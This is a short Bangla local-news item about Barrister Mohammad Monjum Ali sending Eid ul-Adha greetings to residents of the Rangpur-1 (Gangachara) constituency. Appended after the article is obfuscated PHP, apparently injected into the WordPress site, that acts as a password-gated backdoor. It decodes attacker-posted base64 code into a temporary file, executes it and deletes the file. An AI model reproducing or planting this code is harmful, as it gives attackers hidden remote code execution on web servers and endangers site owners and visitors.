|

রংপুর ১-গঙ্গাচড়াবাসীকে ঈদের শুভেচ্ছা জানিয়েছেন ব্যারিস্টার মঞ্জুম আলী

প্রকাশিতঃ 11:31 pm | June 16, 2024

রংপুর ১-গঙ্গাচড়াবাসীকে ঈদের শুভেচ্ছা জানিয়েছেন ব্যারিস্টার মঞ্জুম আলী

স্টাফ রিপোর্টার: ঈদের আনন্দে ত্যাগের মহিমায় আলোকিত হোক সকলের জীবন। সেই প্রত্যাশায় সবাইকে ঈদুল আযহার শুভেচ্ছা জানিয়েছেন গঙ্গাচড়া উপজেলার লক্ষীটারী ইউনিয়নের মহিপুর এর কৃতি সন্তান ইতিমধ্যে যিনি সাধারণ মানুষের মাঝে খ্যাতি লাভ করেছেন মানবিক মানুষ হিসেবে ,সমাজ সেবক ব্যারিস্টার মোহাম্মদ মঞ্জুম আলী।

তিনি বলেন, ঈদুল আযহা আমাদের শিক্ষা দেয় ত্যাগের মহিমায় উদ্ভাসিত হয়ে উঠতে। ঈদ বয়ে আনে সকলের জীবনে আনন্দ ও খুশি। এবারের ঈদ সকলের জন্য খুশি আনন্দ বয়ে আনুক। শুধু রংপুর ১ সংসদীয় আসনবাসী নয় দেশব্যাপী ও বিশ্বব্যাপী ছড়িয়ে পড়ুক ইসলাম ও ঈদের শান্তির বার্তা। ঈদ বয়ে আনুক আমাদের সকলের জীবনে অনাবিল আনন্দ ও সুখধারা।

সমাজ থেকে ঈদকে কেন্দ্র করে দূর হয়ে যাক সকল অমানিশা। রংপুর- ১ আসন (গংগাচড়া ও সিটির ১-৮ নং ওয়ার্ড ) এলাকায় বসবাসরত সকল মানুষের জীবন ভরে উঠুক সুখ শান্তি সমৃদ্ধিতে এই প্রত্যাশায় সবাইকে জানাই ঈদ মোবারক।

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}